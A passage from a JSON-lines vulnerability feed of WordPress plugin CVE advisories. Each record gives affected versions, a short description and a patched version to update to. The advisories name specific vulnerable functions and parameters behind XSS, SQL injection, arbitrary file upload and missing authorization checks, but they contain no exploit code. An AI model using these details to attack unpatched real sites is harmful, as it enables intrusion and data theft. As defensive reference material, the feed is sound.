version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1498fdf-9d5e-4277-92be-469d6646864b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1498fdf-9d5e-4277-92be-469d6646864b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_User.php?rev=2789173#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_User.php?rev=2789173#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_Theme_Switcher.php?rev=2456516#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093975\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093975\\\/apppresser\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7294","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the create_mollie_profile function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to create a mollie payment profile.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbd3209-7ed6-4409-a24e-9f6225cf10f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbd3209-7ed6-4409-a24e-9f6225cf10f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7293","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_mollie_account_details function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to verify the existence of a mollie account.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f065648a-436a-459c-8ab1-c948c78b43c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f065648a-436a-459c-8ab1-c948c78b43c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7292","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized notification dismissal due to a missing capability check on the paytium_notice_dismiss function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to dismiss admin notices.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6642c0-9011-419b-bef6-5aa594993c01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6642c0-9011-419b-bef6-5aa594993c01?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7291","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_mollie_account function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to set up a mollie account.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4491b89-2120-4edb-a396-e45ba09b3b99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4491b89-2120-4edb-a396-e45ba09b3b99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7290","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_for_verified_profiles function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to check profile statuses.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af55c470-b94d-49ee-8b72-44652dcccd73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af55c470-b94d-49ee-8b72-44652dcccd73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7289","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized API key update due to a missing capability check on the paytium_sw_save_api_keys function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to change plugin API keys.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a92beff1-3bc6-459e-aeca-5cbdf2152388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a92beff1-3bc6-459e-aeca-5cbdf2152388?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7288","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_profile_preference function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to change plugin settings.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9bee86-f491-4f68-b10b-051e0fb1a67b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9bee86-f491-4f68-b10b-051e0fb1a67b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7287","slug":"paytium","versionImpact":"4.3.7","versionEndExcluding":"4.4","description":"The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized subscription cancellation due to a missing capability check on the pt_cancel_subscription function in versions up to, and including, 4.3.7. This makes it possible for authenticated attackers with subscriber-level access to cancel a subscription to the plugin.","recommendation":"Update to version 4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/060f31ab-cfa4-4ca8-846a-de76848b28fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/060f31ab-cfa4-4ca8-846a-de76848b28fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2853869%40paytium%2Ftrunk&old=2824314%40paytium%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4545","slug":"sitemap","versionEndExcluding":"4.4","description":"The Sitemap WordPress plugin before 4.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f482cb-fcfd-43e6-9a04-143e06351a70\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f482cb-fcfd-43e6-9a04-143e06351a70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5620","slug":"webpushr-web-push-notifications","versionImpact":"4.34.0","versionEndExcluding":"4.35.0","description":"The Web Push Notifications WordPress plugin before 4.35.0 does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stored XSS attacks.","recommendation":"Update to version 4.35.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03330c2-3ae0-404d-a114-33b18cc47666\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03330c2-3ae0-404d-a114-33b18cc47666\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0254","slug":"guest-author-name","versionImpact":"4.34","versionEndExcluding":"4.35","description":"The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-author-name\\\/trunk\\\/sfly-guest-author.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-author-name\\\/trunk\\\/sfly-guest-author.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5630","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","versionEndExcluding":"4.3000000024","description":"The Insert or Embed Articulate Content into WordPress plugin before 4.3000000024 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.","recommendation":"Update to version 4.3000000024, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/538c875f-4c20-4be0-8098-5bddb7aecff4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/538c875f-4c20-4be0-8098-5bddb7aecff4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6882","slug":"simple-membership","versionImpact":"4.3.8","versionEndExcluding":"4.3.9","description":"The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018environment_mode\u2019 parameter in all versions up to, and including, 4.3.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366165fe-93e5-49ab-b2e5-1de624f22286?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366165fe-93e5-49ab-b2e5-1de624f22286?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010737\\\/simple-membership\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010737\\\/simple-membership\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13490","slug":"ltl-freight-quotes-xpo-edition","versionImpact":"4.3.7","versionEndExcluding":"4.3.8","description":"The LTL Freight Quotes \u2013 XPO Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcfbc26-9b5d-4df8-9f16-293734bd2805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcfbc26-9b5d-4df8-9f16-293734bd2805?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3897","slug":"ays-popup-box","versionImpact":"4.3.6","versionEndExcluding":"4.3.7","description":"The Popup Box \u2013 Best WordPress Popup Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_pb_create_author AJAX action in all versions up to, and including, 4.3.6. This makes it possible for unauthenticated attackers to enumerate all emails registered on the website.","recommendation":"Update to version 4.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71e3624-ccda-4c9c-90e9-e557dd19b644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71e3624-ccda-4c9c-90e9-e557dd19b644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073593\\\/ays-popup-box\\\/tags\\\/4.3.7\\\/admin\\\/class-ays-pb-admin.php?old=3072088&old_path=ays-popup-box%2Ftags%2F4.3.6%2Fadmin%2Fclass-ays-pb-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073593\\\/ays-popup-box\\\/tags\\\/4.3.7\\\/admin\\\/class-ays-pb-admin.php?old=3072088&old_path=ays-popup-box%2Ftags%2F4.3.6%2Fadmin%2Fclass-ays-pb-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9428","slug":"popup-builder","versionImpact":"4.3.4","versionEndExcluding":"4.3.5","description":"The Popup Builder  WordPress plugin before 4.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e246547-e509-48db-88ae-b2f943398377\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47136","slug":"ninja-tables","versionEndExcluding":"4.3.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPManageNinja LLC Ninja Tables \u2013 Best Data Table Plugin for WordPress plugin <=\u00a04.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-tables\\\/wordpress-ninja-tables-best-data-table-plugin-for-wordpress-plugin-4-3-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-tables\\\/wordpress-ninja-tables-best-data-table-plugin-for-wordpress-plugin-4-3-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4451","slug":"ninjafirewall","versionEndExcluding":"4.3.4","description":"The NinjaFirewall plugin for WordPress is vulnerable to Authenticated PHAR Deserialization in versions up to, and including, 4.3.3. This allows authenticated attackers to perform phar deserialization on the server.  This deserialization can allow other plugin or theme exploits if vulnerable software is present (WordPress, and NinjaFirewall).","recommendation":"Update to version 4.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a1fc6c9-50cd-40fd-a777-9eed98aab797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a1fc6c9-50cd-40fd-a777-9eed98aab797?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/security-issue-fixed-in-ninjafirewall-wp-edition\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/security-issue-fixed-in-ninjafirewall-wp-edition\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5026","slug":"enhanced-tooltipglossary","versionImpact":"4.3.3","versionEndExcluding":"4.3.4","description":"The CM Tooltip Glossary WordPress plugin before 4.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a86584f6-119b-45c3-bc6e-dc18e3501db7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a86584f6-119b-45c3-bc6e-dc18e3501db7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0546","slug":"fluentform","versionEndExcluding":"4.3.25","description":"The Contact Form Plugin WordPress plugin before 4.3.25 does not properly sanitize and escape the srcdoc attribute in iframes in it's custom HTML field type, allowing a logged in user with roles as low as contributor to inject arbitrary javascript into a form which will trigger for any visitor to the form or admins previewing or editing the form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/078f33cd-0f5c-46fe-b858-2107a09c6b69\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/078f33cd-0f5c-46fe-b858-2107a09c6b69\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8872","slug":"order-hours-scheduler-for-woocommerce","versionImpact":"4.3.20","versionEndExcluding":"4.3.22","description":"The Store Hours for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.3.20. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cbb51fe-ae7f-4fe8-89ad-38f6d3238cea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cbb51fe-ae7f-4fe8-89ad-38f6d3238cea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157721\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157721\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-hours-scheduler-for-woocommerce\\\/tags\\\/4.3.20\\\/includes\\\/Aspect\\\/Page.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-hours-scheduler-for-woocommerce\\\/tags\\\/4.3.20\\\/includes\\\/Aspect\\\/Page.php#L155\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1617","slug":"wp-invoice","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e40e506-ad02-44ca-9d21-3634f3907aad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e40e506-ad02-44ca-9d21-3634f3907aad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13491","slug":"small-package-quotes-fedex-edition","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Small Package Quotes \u2013 For Customers of FedEx plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242108%40small-package-quotes-fedex-edition&new=3242108%40small-package-quotes-fedex-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242108%40small-package-quotes-fedex-edition&new=3242108%40small-package-quotes-fedex-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba311865-be4b-4c56-a761-409582e981b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba311865-be4b-4c56-a761-409582e981b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2544","slug":"popup-builder","versionImpact":"4.3.0","versionEndExcluding":"4.3.2","description":"The Popup Builder plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on all AJAX actions. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform multiple unauthorized actions, such as deleting subscribers, and importing subscribers to conduct stored cross-site scripting attacks.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04802c63-4a5d-4948-9ef1-cf89c4cc757e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04802c63-4a5d-4948-9ef1-cf89c4cc757e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096000%40popup-builder%2Ftrunk&old=3085485%40popup-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096000%40popup-builder%2Ftrunk&old=3085485%40popup-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4577","slug":"custom-facebook-feed","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Smash Balloon Social Post Feed \u2013 Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3.2, or a newer patched 